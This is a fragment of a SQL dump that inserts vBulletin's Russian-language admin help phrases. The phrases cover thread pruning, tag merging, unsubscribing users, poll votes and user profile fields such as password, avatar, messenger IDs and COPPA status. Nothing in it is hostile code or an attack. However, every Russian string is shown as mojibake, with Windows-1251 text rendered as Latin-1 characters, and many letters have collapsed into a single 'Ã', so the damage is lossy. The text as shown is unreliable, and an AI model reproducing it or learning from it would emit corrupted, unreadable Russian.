\r\nÑìîòðèòå âûøå.', 'vbulletin', '', 0, ''), (24151, -1, 'thread_prune_move_status_title', 'cphelptext', 'Ñòàòóñ òåìû', 'vbulletin', '', 0, ''), (24152, -1, 'thread_prune_move_posteduser_text', 'cphelptext', 'Åñëè òåìà ñîçäàíà óêàçàííûì ïîëüçîâàòåëåì, òî îíà áóäåò óäàëåíà/ïåðåìåùåíà. Ãòî ïîëåçíî äëÿ áîðüáû ñ ïîëüçîâàòåëÿìè, ñîçäàþùèìè ìíîãî òåì ñî ñïàìîì.', 'vbulletin', '', 0, ''), (24153, -1, 'thread_prune_move_posteduser_title', 'cphelptext', 'Èìÿ', 'vbulletin', '', 0, ''), (24154, -1, 'thread_prune_move_titlecontains_text', 'cphelptext', 'Åñëè íàçâàíèå òåìû ñîäåðæèò ýòó ñòðî÷êó, òî îíà áóäåò óäàëåíà/ïåðåìåùåíà. Ãåãèñòð íå âëèÿåò.', 'vbulletin', '', 0, ''), (24155, -1, 'thread_prune_move_titlecontains_title', 'cphelptext', 'Çàãîëîâîê', 'vbulletin', '', 0, ''), (24156, -1, 'thread_prune_move_forumid_text', 'cphelptext', 'Âûáåðèòå ðàçäåë, èç êîòîðîãî âû æåëàåòå óäàëèòü/ïåðåìåñòèòü òåìû. ×òîáû áûòü äîñòóïíûìè äëÿ âûáîðà, òåìû äîëæíû áûòü â ýòîì ðàçäåëå. Âûáåðèòå \"Âñå ðàçäåëû\", ÷òîáû âûáèðàòü òåìû íåçàâèñèìî îò ðàçäåëà.', 'vbulletin', 'zCarot', 1205941360, '3.7.0 Release Candidate 1'), (24157, -1, 'thread_prune_move_forumid_title', 'cphelptext', 'Ãàçäåë', 'vbulletin', '', 0, ''), (24158, -1, 'thread_prune_move_subforums_text', 'cphelptext', 'Åñëè âû æåëàåòå âêëþ÷àòü ïîäðàçäåëû ðàçäåëîâ, òî âêëþ÷èòå ýòó îïöèþ. Ãàïðèìåð, åñëè Ãàçäåë2 - ïîäðàçäåë ðàçäåëà Ãàçäåë1 è ïðè ïîèñêå âûáåðåòñÿ Ãàçäåë1, òî Ãàçäåë2 òîæå áóäåò âêëþ÷¸í â ïîèñê, åñëè ýòà îïöèÿ âêëþ÷åíà.', 'vbulletin', '', 0, ''), (24159, -1, 'thread_prune_move_subforums_title', 'cphelptext', 'Âêëþ÷àòü ïîäðàçäåëû', 'vbulletin', '', 0, ''), (24160, -1, 'thread_prune_move_prefixid_text', 'cphelptext', 'Âûáåðèòå ïðåôèêñ, êîòîðûé äîëæíû èìåòü òåìû. Âûáåðèòå \"(áåç ïðåôèêñà)\", ÷òîáû èñêàòü òîëüêî òåìû, êîòîðûå íå èìåþò ïðåôèêñà.', 'vbulletin', 'zCarot', 1190110079, '3.7.0 Beta 1'), (24161, -1, 'thread_prune_move_prefixid_title', 'cphelptext', 'Ãðåôèêñ', 'vbulletin', 'zCarot', 1190110079, '3.7.0 Beta 1'), (24162, -1, 'thread_pruneusersel_text', 'cphelptext', 'Ãèæå íàõîäèòñÿ ñïèñîê âñåõ ñîîòâåòñòâóþùèõ òåì è ñîîáùåíèé. Îòìåòüòå òåìû è ñîîáùåíèÿ, êîòîðûå æåëàåòå óäàëèòü. Ãàæìèòå íà êíîïêó \"Ok\" äëÿ ïðîäîëæåíèÿ. Âû ìîæåòå ïðîñìîòðåòü òåìó èëè ñîîáùåíèå â íîâîì îêíå, íàæàâ íà èõ íàçâàíèå èëè çàãîëîâîê.', 'vbulletin', '', 0, ''), (24163, -1, 'thread_pruneusersel_title', 'cphelptext', 'Âûáîðî÷íîå óäàëåíèå òåì è ñîîáùåíèé', 'vbulletin', '', 0, ''), (24164, -1, 'thread_removepoll_text', 'cphelptext', 'Çäåñü âû ìîæåòå ïîäòâåðäèòü ñâî¸ æåëàíèå óäàëèòü âûáðàííûé îïðîñ. Óáåäèòåñü, ÷òî èíôîðìàöèÿ íèæå ïðàâèëüíà. Ãàæìèòå íà êíîïêó \"Óäàëèòü\", åñëè âñ¸ âåðíî.', 'vbulletin', '', 0, ''), (24165, -1, 'thread_removepoll_title', 'cphelptext', 'Óäàëèòü îïðîñ', 'vbulletin', '', 0, ''), (24166, -1, 'thread_tagmerge_tagtext_text', 'cphelptext', 'Ââåä¸ííàÿ ìåòêà áóäåò îáúåäèíÿòü âñå âûáðàííûå ìåòêè. Åñëè íîâàÿ ìåòêà åù¸ íå ñóùåñòâóåò, òî îíà áóäåò ñîçäàíà. Ãîâàÿ ìåòêà ìîæåò áûòü îäíîé èç âûáðàííûõ. Åñëè âû âûáðàëè âñåãî îäíó ìåòêó è íîâàÿ ìåòêà íå ñóùåñòâóåò, òî, ôàêòè÷åñêè, âû ïåðåèìåíóåòå ìåòêó.', 'vbulletin', 'zCarot', 1216743771, '3.8.0 Alpha 1'), (24167, -1, 'thread_tagmerge_tagtext_title', 'cphelptext', 'Îáúåäèíèòü ìåòêè', 'vbulletin', 'zCarot', 1216743741, '3.8.0 Alpha 1'), (24168, -1, 'thread_tags_tagtext_text', 'cphelptext', 'Ñèñòåìà ìåòîê äà¸ò âîçìîæíîñòü ïîëüçîâàòåëÿì äîáàâëÿòü ñâîè êëþ÷åâûå ñëîâà (ìåòêè) ê òåìàì. Âû ìîæåòå óçíàòü áîëüøå èíôîðìàöèè î ìåòêàõ â àíãëîÿçû÷íîé ÷àñòè Wikipedia.
\r\n
\r\nÇäåñü âû ìîæåòå óïðàâëÿòü ñóùåñòâóþùèìè ìåòêàìè è ñîçäàâàòü íîâûå. Ãîìíèòå, ÷òî âû íå ìîæåòå ñîçäàòü òàêèå ìåòêè, êîòîðûå íå áóäóò äîñòóïíû äëÿ ïîëüçîâàòåëåé. Ãòî òàêæå îçíà÷àåò, ÷òî âû íå ìîæåòå îáîéòè ïàðàìåòð ìàêñèìàëüíîãî ðàçìåðà äëÿ ìåòêè, è èñïîëüçîâàòü â ìåòêå ñëîâî, ïîäâåðãíóòîå öåíçóðå íà âàøåì ôîðóìå.', 'vbulletin', 'zCarot', 1191253897, '3.7.0 Beta 1'), (24169, -1, 'thread_tags_tagtext_title', 'cphelptext', 'Ñïèñîê ìåòîê', 'vbulletin', 'zCarot', 1191253897, '3.7.0 Beta 1'), (24170, -1, 'thread_unsubscribe_text', 'cphelptext', 'Ãà ýòîé ñòðàíèöå âû ìîæåòå îòïèñàòü âñåõ ïîëüçîâàòåëåé îò óêàçàííîé òåìû èëè óäàëèòü âñå ïîäïèñêè äëÿ óêàçàííîãî ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24171, -1, 'thread_unsubscribe_title', 'cphelptext', 'Îòïèñêà îò òåì', 'vbulletin', '', 0, ''), (24172, -1, 'thread_unsubscribe_ids_text', 'cphelptext', 'Âñå ïîëüçîâàòåëè, êîòîðûå ïîäïèñàíû íà ýòè òåìû áóäóò îòïèñàíû îò íèõ. Âû ìîæåòå óçíàòü ID íóæíîé òåìû, âçãëÿíóâ íà å¸ àäðåñ. Ãàïðèìåð, òåìà ñ URL http://www.example.com/forum/showthread.php?t=2 èìååò ID òåìû 2.', 'vbulletin', '', 0, ''), (24173, -1, 'thread_unsubscribe_ids_title', 'cphelptext', 'Ââåäèòå ID òåì(û)', 'vbulletin', '', 0, ''), (24174, -1, 'thread_unsubscribe_username_text', 'cphelptext', 'Ââåäèòå èìÿ ïîëüçîâàòåëÿ, ÷üè ïîäïèñêè æåëàåòå óäàëèòü. Ãòîò ïîëüçîâàòåëü áóäåò îòïèñàí îò âñåõ òåì, íà êîòîðûå îí áûë ïîäïèñàí. Ãðîïóñòèòå ýòîò ïóíêò, ÷òîáû îòïèñàòü âñåõ ïîëüçîâàòåëåé îò âñåõ òåì, ñîîòâåòñòâóþùèì êðèòåðèÿì íèæå.', 'vbulletin', '', 0, ''), (24175, -1, 'thread_unsubscribe_username_title', 'cphelptext', 'Èìÿ', 'vbulletin', '', 0, ''), (24176, -1, 'thread_unsubscribe_daysprune_text', 'cphelptext', 'Ãîñëåäíåå ñîîáùåíèå â òåìå äîëæíî áûòü ðàçìåùåíî íå ìåíåå, ÷åì X äíåé íàçàä, ÷òîáû îòïèñàòü îò íå¸ ïîëüçîâàòåëåé. Ãòî ïîëåçíî äëÿ óäàëåíèÿ ïîäïèñîê íà òåìû, êîòîðûå óñòàðåëè è äàâíî íå îáñóæäàþòñÿ.', 'vbulletin', 'Vovan', 0, ''), (24177, -1, 'thread_unsubscribe_daysprune_title', 'cphelptext', 'Ãàéòè âñå òåìû ñòàðøå X äíåé', 'vbulletin', '', 0, ''), (24178, -1, 'thread_unsubscribe_forumid_text', 'cphelptext', 'Òåìà äîëæíà áûòü â ýòîì ðàçäåëå, ÷òîáû îòïèñàòü îò íå¸ ïîëüçîâàòåëÿ. Âûáåðèòå \"Âñå ðàçäåëû\", ÷òîáû îòïèñûâàòü ýòîãî ïîëüçîâàòåëÿ îò òåì íå çàâèñèìî îò òîãî, â êàêîì îíà ðàçäåëå.', 'vbulletin', 'zCarot', 1205941374, '3.7.0 Release Candidate 1'), (24179, -1, 'thread_unsubscribe_forumid_title', 'cphelptext', 'Ãàçäåë', 'vbulletin', '', 0, ''), (24180, -1, 'thread_votes_text', 'cphelptext', 'Ãòà ñòðàíèöà ïîçâîëÿåò âàì óâèäåòü, êàêèå ïîëüçîâàòåëè çà ÷òî ãîëîñîâàëè â ëþáîì îïðîñå âàøåãî ôîðóìà. Âûáåðèòå îïðîñ èç ìåíþ íèæå è íàæìèòå êíîïêó \"Êòî ãîëîñîâàë\", ÷òîáû óâèäåòü ðàñïðåäåëåíèå ãîëîñîâ.', 'vbulletin', '', 0, ''), (24181, -1, 'thread_votes_title', 'cphelptext', 'Êòî ãîëîñîâàë', 'vbulletin', '', 0, ''), (24182, -1, 'thread_votes_pollid_text', 'cphelptext', 'Âûáåðèòå â ýòîì ìåíþ îïðîñ. Îïðîñû îòñîðòèðîâàíû ïî ID îïðîñà, òî åñòü ïî äàòå ðàçìåùåíèÿ. Ãîëåå ñòàðûå îïðîñû èìåþò ìàëåíüêèé ID, íîâûå - áîëüøîé.', 'vbulletin', '', 0, ''), (24183, -1, 'thread_votes_pollid_title', 'cphelptext', 'Ãîëîñîâàíèå', 'vbulletin', '', 0, ''), (24184, -1, 'thread_votes_threadtitle_text', 'cphelptext', 'Ãòî íàçâàíèå òåìû, ê êîòîðîé ïðèíàäëåæèò âûáðàííûé âûøå îïðîñ. Ãàçâàíèå çäåñü äëÿ òîãî, ÷òîáû âû óëîâèëè ñâÿçü ìåæäó çàãîëîâêîì îïðîñà è íàçâàíèåì òåìû.', 'vbulletin', '', 0, ''), (24185, -1, 'thread_votes_threadtitle_title', 'cphelptext', 'Òåìà', 'vbulletin', '', 0, ''), (24186, -1, 'user_text', 'cphelptext', 'Ñïðàâî÷íûå ñòàòüè:
\r\nÃîëüçîâàòåëè
\r\nÓïðàâëåíèå ïîëüçîâàòåëÿìè
\r\nÃëîêèðîâêà ïîëüçîâàòåëÿ
\r\nÃàññûëêà ýëåêòðîííûõ ïèñåì
\r\nÌàñêè äîñòóïà

\r\nÃîëüçîâàòåëè:
\r\nÑèñòåìà ïîëüçîâàòåëåé ñîñòîèò èç íåñêîëüêèõ ÷àñòåé, ïîýòîìó óáåäèòåñü, ÷òî âû îçíàêîìèëèñü ñ ïðåäëîæåííûìè âûøå ñòàòüÿìè.  ðàçäåëå \"Ãîëüçîâàòåëè\" ïàíåëè àäìèíèñòðàòîðà âû èìååòå âîçìîæíîñòü äîáàâëÿòü íîâûõ ïîëüçîâàòåëåé, èñêàòü ñóùåñòâóþùèõ ïî ðàçëè÷íûì ïàðàìåòðàì, óäàëÿòü ïîëüçîâàòåëåé è ïðîèçâîäèòü äðóãèå îïåðàöèè, êîòîðûå îïèñàíû â òåìàõ ñïðàâêè \"Óïðàâëåíèå ïîëüçîâàòåëÿìè\", \"Ãëîêèðîâêà ïîëüçîâàòåëÿ\", \"Ãàññûëêà ýëåêòðîííûõ ïèñåì\" è \"Ìàñêè äîñòóïà\".

\r\nÄîáàâëåíèå íîâîãî ïîëüçîâàòåëÿ ÷åðåç ïàíåëü àäìèíèñòðàòîðà - òîæå ñàìîå, ÷òî è îáû÷íàÿ ðåãèñòðàöèÿ, íî â ïàíåëè àäìèíèñòðàòîðà ðåãèñòðàöèÿ íå òðåáóåò çàïîëíåíèÿ âñåõ ïîëåé è ñîãëàñèÿ ñ òðåáîâàíèÿìè, óêàçàííûìè â ðåãèñòðàöèîííîé ôîðìå. Ãàïðèìåð, âû ìîæåòå ñîçäàòü ïîëüçîâàòåëÿ áåç óêàçàíèÿ àäðåñà ýëåêòðîííîé ïî÷òû. ×òîáû ýòî ñäåëàòü, çàéäèòå íà ñòðàíèöó Äîáàâèòü ïîëüçîâàòåëÿ.

\r\nÃîèñê ïîëüçîâàòåëåé îáåñïå÷èâàåò âîçìîæíîñòü ïîèñêà ïî ìíîãî÷èñëåííûì ïàðàìåòðàì, à òàêæå ðàçëè÷íûå âàðèàíòû îòîáðàæåíèÿ ðåçóëüòàòîâ. Âû ìîæåòå èñïîëüçîâàòü ýòó ôóíêöèþ äëÿ ïîèñêà è ðåäàêòèðîâàíèÿ ïîëüçîâàòåëåé è äëÿ ïîëó÷åíèÿ èíôîðìàöèè î ïîëüçîâàòåëå è åãî ïðîôèëå. Ñì. ñòðàíèöó Ãîèñê ïîëüçîâàòåëåé.

\r\nÑèñòåìà ïîëüçîâàòåëåé òàêæå ïîçâîëÿåò ìàññîâî óäàëÿòü/ïåðåìåùàòü ïîëüçîâàòåëåé, îòîáðàâ èõ ïî ãðóïïå, äàòå ïîñëåäíåãî âèçèòà, äàòå ðåãèñòðàöèè è êîëè÷åñòâó ñîîáùåíèé. Ãàïðèìåð, îòñþäà ìîæíî ìàññîâî óäàëÿòü íåàêòèâíûõ ïîëüçîâàòåëåé è èçìåíÿòü ãðóïïó äëÿ óïðàâëåíèÿ ïðàâàìè äîñòóïà. Ñòðàíèöà óäàëåíèÿ/ïåðåìåùåíèÿ ïîëüçîâàòåëåé íàõîäèòñÿ çäåñü.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24187, -1, 'user_title', 'cphelptext', 'ÃŽ ïîëüçîâàòåëÿõ', 'vbulletin', '', 0, ''), (24188, -1, 'user_add_text', 'cphelptext', 'Ãòà ñòðàíèöà ìîæåò áûòü èñïîëüçîâàíà äëÿ òîãî, ÷òîáû äîáàâèòü íîâîãî ïîëüçîâàòåëÿ íà âàø ôîðóì.', 'vbulletin', '', 0, ''), (24189, -1, 'user_add_title', 'cphelptext', 'Äîáàâëåíèå ïîëüçîâàòåëÿ', 'vbulletin', '', 0, ''), (24190, -1, 'user_add_password_text', 'cphelptext', 'Ââåäèòå ïàðîëü ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24191, -1, 'user_add_password_title', 'cphelptext', 'Ãàðîëü', 'vbulletin', '', 0, ''), (24192, -1, 'user_add_edit_adminavatar_text', 'cphelptext', 'Ãòà îïöèÿ ðàçðåøàåò ïîëüçîâàòåëþ îñòàâèòü íåñòàíäàðòíûé àâàòàð, åñëè îí ïîòåðÿåò ïðàâî èìåòü åãî ïðè èçìåíåíèè ãðóïïû ïîëüçîâàòåëåé.\r\n\r\nÅñëè ïîëüçîâàòåëü áóäåò ïåðåìåù¸í â ãðóïïó ïîëüçîâàòåëåé, íå èìåþùóþ ïðàâà èñïîëüçîâàòü íåñòàíäàðòíûé àâàòàð, òî àâàòàð ïîëüçîâàòåëÿ âñ¸ åù¸ áóäåò âèäåí â ñîîáùåíèÿõ, â ïðîôèëå è â ñïèñêå ïîëüçîâàòåëåé, åñëè ýòà îïöèÿ âêëþ÷åíà.\r\n\r\nÃòà îïöèÿ íå ðàçðåøàåò ïîëüçîâàòåëÿì èçìåíÿòü ñâîé àâàòàð. ×òîáû ñäåëàòü ýòî, íóæíî èìåòü ñîîòâåòñòâóþùèå ïðàâà.\r\n\r\nÅñëè àäìèíèñòðàòîð èçìåíÿåò èëè ïðèñâàèâàåò ïîëüçîâàòåëþ íåñòàíäàðòíûé àâàòàð, è åñëè ãðóïïà ïîëüçîâàòåëåé íå äà¸ò åìó ïðàâî èìåòü íåñòàíäàðòíûé àâàòàð, òî äàííàÿ îïöèÿ áóäåò àâòîìàòè÷åñêè âêëþ÷åíà.', 'vbulletin', 'zCarot', 1144687826, '3.6.0 Beta 1'), (24193, -1, 'user_add_edit_adminavatar_title', 'cphelptext', 'Ñîõðàíèòü íåñòàíäàðòíûé àâàòàð', 'vbulletin', 'zCarot', 1144687826, '3.6.0 Beta 1'), (24194, -1, 'user_add_edit_adminprofilepic_text', 'cphelptext', 'Ãòà îïöèÿ ðàçðåøàåò ïîëüçîâàòåëþ îñòàâèòü ôîòîãðàôèþ, åñëè îí ïîòåðÿåò ïðàâî èìåòü å¸ ïðè èçìåíåíèè ãðóïïû ïîëüçîâàòåëåé.\r\n\r\nÅñëè ïîëüçîâàòåëü áóäåò ïåðåìåù¸í â ãðóïïó ïîëüçîâàòåëåé, íå èìåþùóþ ïðàâà èñïîëüçîâàòü ôîòîãðàôèþ, òî ôîòîãðàôèÿ ïîëüçîâàòåëÿ âñ¸ åù¸ áóäåò âèäíà â ïðîôèëå è â ñïèñêå ïîëüçîâàòåëåé, åñëè ýòà îïöèÿ âêëþ÷åíà.\r\n\r\nÃòà îïöèÿ íå ðàçðåøàåò ïîëüçîâàòåëÿì èçìåíÿòü ñâîþ ôîòîãðàôèþ. ×òîáû ñäåëàòü ýòî, íóæíî èìåòü ñîîòâåòñòâóþùèå ïðàâà.\r\n\r\nÅñëè àäìèíèñòðàòîð èçìåíÿåò èëè ïðèñâàèâàåò ïîëüçîâàòåëþ ôîòîãðàôèþ, è åñëè ãðóïïà ïîëüçîâàòåëåé íå äà¸ò åìó ïðàâî èìåòü ôîòîãðàôèþ, òî äàííàÿ îïöèÿ áóäåò àâòîìàòè÷åñêè âêëþ÷åíà.', 'vbulletin', 'zCarot', 1144687906, '3.6.0 Beta 1'), (24195, -1, 'user_add_edit_adminprofilepic_title', 'cphelptext', 'Ñîõðàíèòü ôîòîãðàôèþ', 'vbulletin', 'zCarot', 1144687906, '3.6.0 Beta 1'), (24196, -1, 'user_add_edit_ipoints_text', 'cphelptext', 'Êîëè÷åñòâî áàëëîâ íàðóøåíèé, êîòîðûå èìååò ïîëüçîâàòåëü. ×òîáû îáíóëèòü óäàëèòå çíà÷åíèå èç ñòðîêè.', 'vbulletin', 'zCarot', 1199284165, '3.7.0 Beta 4'), (24197, -1, 'user_add_edit_ipoints_title', 'cphelptext', 'Ãàëëû íàðóøåíèé', 'vbulletin', 'zCarot', 1199284165, '3.7.0 Beta 4'), (24198, -1, 'user_add_edit_vm_enable_text', 'cphelptext', 'Åñëè \"Ãåò\", òî îòïðàâêà ïóáëè÷íûõ ñîîáùåíèé ýòîìó ïîëüçîâàòåëþ áóäåò íåâîçìîæíà.', 'vbulletin', 'zCarot', 1207920354, '3.7.0 Release Candidate 4'), (24199, -1, 'user_add_edit_vm_enable_title', 'cphelptext', 'Âêëþ÷èòü ïóáëè÷íûå ñîîáùåíèÿ', 'vbulletin', 'zCarot', 1207920279, '3.7.0 Release Candidate 4'), (24200, -1, 'user_add_edit_warnings_text', 'cphelptext', 'Êîëè÷åñòâî ïðåäóïðåæäåíèé, êîòîðûå èìååò ïîëüçîâàòåëü. ×òîáû îáíóëèòü óäàëèòå çíà÷åíèå èç ñòðîêè.', 'vbulletin', 'zCarot', 1199284220, '3.7.0 Beta 4'), (24201, -1, 'user_add_edit_warnings_title', 'cphelptext', 'Ãðåäóïðåæäåíèÿ', 'vbulletin', 'zCarot', 1199284076, '3.7.0 Beta 4'), (24202, -1, 'user_add_edit_infractions_text', 'cphelptext', 'Êîëè÷åñòâî íàðóøåíèé, êîòîðûå èìååò ïîëüçîâàòåëü. ×òîáû îáíóëèòü óäàëèòå çíà÷åíèå èç ñòðîêè.', 'vbulletin', 'zCarot', 1199284187, '3.7.0 Beta 4'), (24203, -1, 'user_add_edit_infractions_title', 'cphelptext', 'Ãàðóøåíèÿ', 'vbulletin', 'zCarot', 1199284133, '3.7.0 Beta 4'), (24204, -1, 'user_add_edit_username_text', 'cphelptext', 'Ââåäèòå èìÿ ïîëüçîâàòåëÿ. Èìÿ ïîëüçîâàòåëÿ èñïîëüçóåòñÿ ïðè âõîäå íà ôîðóì è îòîáðàæàåòñÿ â ñîîáùåíèÿõ ïîëüçîâàòåëÿ.

\r\nÅñëè âû ðåäàêòèðóåòå èìÿ ñóùåñòâóþùåãî ïîëüçîâàòåëÿ, òî ïîñëå ðåäàêòèðîâàíèÿ âû äîëæíû îáíîâèòü âàøè ñ÷¸ò÷èêè.', 'vbulletin', '', 0, ''), (24205, -1, 'user_add_edit_username_title', 'cphelptext', 'Èìÿ ïîëüçîâàòåëÿ', 'vbulletin', '', 0, ''), (24206, -1, 'user_add_edit_email_text', 'cphelptext', 'Ââåäèòå àäðåñ ýëåêòðîííîé ïî÷òû ïîëüçîâàòåëÿ, êîòîðûé áóäåò èñïîëüçîâàòüñÿ äëÿ êîíòàêòà ñ íèì ÷åðåç ôîðóì.', 'vbulletin', '', 0, ''), (24207, -1, 'user_add_edit_email_title', 'cphelptext', 'Àäðåñ ýëåêòðîííîé ïî÷òû', 'vbulletin', '', 0, ''), (24208, -1, 'user_add_edit_languageid_text', 'cphelptext', 'Âûáåðèòå ÿçûê, êîòîðûé èñïîëüçóåòñÿ ïîëüçîâàòåëåì íà ôîðóìå.', 'vbulletin', '', 0, ''), (24209, -1, 'user_add_edit_languageid_title', 'cphelptext', 'ßçûê', 'vbulletin', '', 0, ''), (24210, -1, 'user_add_edit_usertitle_text', 'cphelptext', 'Ââåäèòå ñòàòóñ ïîëüçîâàòåëÿ. Ñòàòóñ îòîáðàæàåòñÿ ðÿäîì ñ èìåíåì ïîëüçîâàòåëÿ â ðàçìåùàåìûõ èì ñîîáùåíèÿõ. Åñëè âû ïðèñâàèâàåòå ïîëüçîâàòåëþ îñîáûé ñòàòóñ, íå çàáóäüòå óñòàíîâèòü íà \"Äà\" ñëåäóþùóþ îïöèþ (\"Îñîáûé ñòàòóñ\").', 'vbulletin', '', 0, ''), (24211, -1, 'user_add_edit_usertitle_title', 'cphelptext', 'Ñòàòóñ ïîëüçîâàòåëÿ', 'vbulletin', '', 0, ''), (24212, -1, 'user_add_edit_customtitle_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ïîëüçîâàòåëü áóäåò èìåòü ñòàòóñ, ïðèñâîåííûé äëÿ åãî îñíîâíîé ãðóïïû ïîëüçîâàòåëåé.\r\n

\r\nÊîãäà óñòàíîâëåíî íà \"Äà, íàñòðîéêà ïîëüçîâàòåëÿ\", òî ïîëüçîâàòåëüñêèé ñòàòóñ áóäåò çàìåí¸í òåì, ÷òî íàïèñàíî â ýòîì ïîëå. Êîä HTML íå äîïóñòèì, è ýòî òî æå ñàìîå, ÷òî è åñëè áû ïîëüçîâàòåëü ââ¸ë ýòè äàííûå ÷åðåç ñâîþ ïàíåëü. Çàìåíà ñòàòóñà ïðîèçîéä¸ò òîëüêî â òîì ñëó÷àå, åñëè ïîëüçîâàòåëü íàõîäèòñÿ â ãðóïïå, êîòîðîé ðàçðåøåíî ýòî ñäåëàòü.\r\n

\r\nÊîãäà óñòàíîâëåíî íà \"Äà, íàñòðîéêà àäìèíèñòðàòîðà (HTML ðàçðåø¸í)\", òî ñòàòóñ ïîëüçîâàòåëÿ áóäåò çàìåí¸í òåì, ÷òî ââåäåíî â ýòî ïîëå. Êîä HTML áóäåò îòîáðàæàòüñÿ êàê åñòü. Ãòîò ñòàòóñ áóäåò çàìåí¸í, äàæå åñëè ãðóïïà ïîëüçîâàòåëÿ íå ïîçâîëÿåò ìåíÿòü åãî.', 'vbulletin', '', 0, ''), (24213, -1, 'user_add_edit_customtitle_title', 'cphelptext', 'Îñîáûé ñòàòóñ', 'vbulletin', '', 0, ''), (24214, -1, 'user_add_edit_homepage_text', 'cphelptext', 'Ââåäèòå ñþäà äîìàøíþþ ñòðàíè÷êó ïîëüçîâàòåëÿ (http://www... ).', 'vbulletin', '', 0, ''), (24215, -1, 'user_add_edit_homepage_title', 'cphelptext', 'Äîìàøíÿÿ ñòðàíè÷êà', 'vbulletin', '', 0, ''), (24216, -1, 'user_add_edit_birthday_text', 'cphelptext', 'Ââåäèòå ñþäà äàòó ðîæäåíèÿ ïîëüçîâàòåëÿ. Âûáåðèòå ìåñÿö è ââåäèòå äâå öèôðû äíÿ è ÷åòûðå - ãîäà.', 'vbulletin', '', 0, ''), (24217, -1, 'user_add_edit_birthday_title', 'cphelptext', 'Äåíü ðîæäåíèÿ', 'vbulletin', '', 0, ''), (24218, -1, 'user_add_edit_showbirthday_text', 'cphelptext', 'Âûáåðèòå çäåñü óðîâåíü ñåêðåòíîñòè äëÿ äíÿ ðîæäåíèÿ ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24219, -1, 'user_add_edit_showbirthday_title', 'cphelptext', 'Êîíôèäåíöèàëüíîñòü', 'vbulletin', '', 0, ''), (24220, -1, 'user_add_edit_signature_text', 'cphelptext', 'Ââåäèòå çäåñü ïîäïèñü ïîëüçîâàòåëÿ. Ãàñïîçíàâàíèå HTML, BB êîäîâ è ñìàéëîâ îïðåäåëÿåòñÿ ýòèìè íàñòðîéêàìè.', 'vbulletin', 'zCarot', 1206964560, '3.7.0 Release Candidate 2'), (24221, -1, 'user_add_edit_signature_title', 'cphelptext', 'Ãîäïèñü', 'vbulletin', '', 0, ''), (24222, -1, 'user_add_edit_icq_text', 'cphelptext', 'Ââåäèòå ñþäà íîìåð ICQ.

\r\nICQ - ïîïóëÿðíûé ñåðâèñ áûñòðûõ ñîîáùåíèé. Óçíàéòå áîëüøå î í¸ì íà äîìàøíåé ñòðàíèöå ICQ.

\r\nÇäåñü ìîæåò áûòü âàøà ðåêëàìà ïî ðàçäà÷å/ïðîäàæå êðàñèâûõ íîìåðêîâ ;))', 'vbulletin', '', 0, ''), (24223, -1, 'user_add_edit_icq_title', 'cphelptext', 'Ãîìåð ICQ', 'vbulletin', '', 0, ''), (24224, -1, 'user_add_edit_aim_text', 'cphelptext', 'Ââåäèòå ñþäà AIM èìÿ ïîëüçîâàòåëÿ.

\r\nAIM - ïîïóëÿðíûé ñåðâèñ áûñòðûõ ñîîáùåíèé. Óçíàéòå áîëüøå î í¸ì íà äîìàøíåé ñòðàíèöå AIM.', 'vbulletin', '', 0, ''), (24225, -1, 'user_add_edit_aim_title', 'cphelptext', 'Èìÿ â AIM', 'vbulletin', '', 0, ''), (24226, -1, 'user_add_edit_yahoo_text', 'cphelptext', 'Ââåäèòå Ãîìåð Yahoo! Messenger`à ïîëüçîâàòåëÿ.

\r\nYahoo! Messenger - ïîïóëÿðíûé ñåðâèñ ìãíîâåííûõ ñîîáùåíèé. Óçíàéòå áîëüøå îá ýòîì íà ñòðàíèöå Yahoo! Messenger`à.', 'vbulletin', '', 0, ''), (24227, -1, 'user_add_edit_yahoo_title', 'cphelptext', 'Ãîìåð Yahoo!', 'vbulletin', '', 0, ''), (24228, -1, 'user_add_edit_msn_text', 'cphelptext', 'Ââåäèòå ñþäà èìÿ â MSN ïîëüçîâàòåëÿ.
\r\n
\r\nMSN Messenger - ïîïóëÿðíûé ñåðâèñ áûñòðûõ ñîîáùåíèé. Óçíàéòå áîëüøå î í¸ì íà äîìàøíåé ñòðàíèöå MSN Messenger.', 'vbulletin', '', 0, ''), (24229, -1, 'user_add_edit_msn_title', 'cphelptext', 'Èìÿ MSN', 'vbulletin', '', 0, ''), (24230, -1, 'user_add_edit_skype_text', 'cphelptext', 'Ââåäèòå ñþäà èìÿ ïîëüçîâàòåëÿ â Skype.
\r\n
\r\nÈìåíà â Skype ìîãóò áûòü íå ìåíåå 6 ñèìâîëîâ è ñîäåðæàò ëàòèíñêèå áóêâû, öèôðû, ñèìâîëû ïîä÷¸ðêèâàíèÿ, äåôèñû, çàïÿòûå è ïðîáåëû.
\r\n
\r\nSkype - ïîïóëÿðíûé ñåðâèñ ïåðåäà÷è ãîëîñà ÷åðåç èíòåðíåò (voice-over-IP) è òåëåôîíèè. ×òîáû óçíàòü áîëüøå, ïîñåòèòå âåá-ñàéò Skype.', 'vbulletin', '', 0, ''), (24231, -1, 'user_add_edit_skype_title', 'cphelptext', 'Èìÿ â Skype', 'vbulletin', '', 0, ''), (24232, -1, 'user_add_edit_coppauser_text', 'cphelptext', 'COPPA-ïîëüçîâàòåëü - ïîëüçîâàòåëü ìëàäøå 13 ëåò. COPPA - çàêîí, òðåáóþùèé ðàçðåøåíèÿ ðîäèòåëåé äåòåé ìëàäøå 13 ëåò äî òîãî, êàê îíè ñìîãóò ïèñàòü íà ôîðóìå.

\r\n×òîáû óçíàòü áîëüøå îá ýòîì çàêîíå, ñìîòðèòå çäåñü: http://www.ftc.gov/bcp/edu/pubs/business/idtheft/bus45.shtm.', 'vbulletin', 'zCarot', 1231760784, '3.8.1'), (24233, -1, 'user_add_edit_coppauser_title', 'cphelptext', 'COPPA', 'vbulletin', '', 0, ''), (24234, -1, 'user_add_edit_parentemail_text', 'cphelptext', 'Ââåäèòå ñþäà àäðåñ ýëåêòðîííîé ïî÷òû ðîäèòåëåé ïîëüçîâàòåëÿ. Ãòî òðåáóåòñÿ òîëüêî äëÿ COPPA-ïîëüçîâàòåëåé.

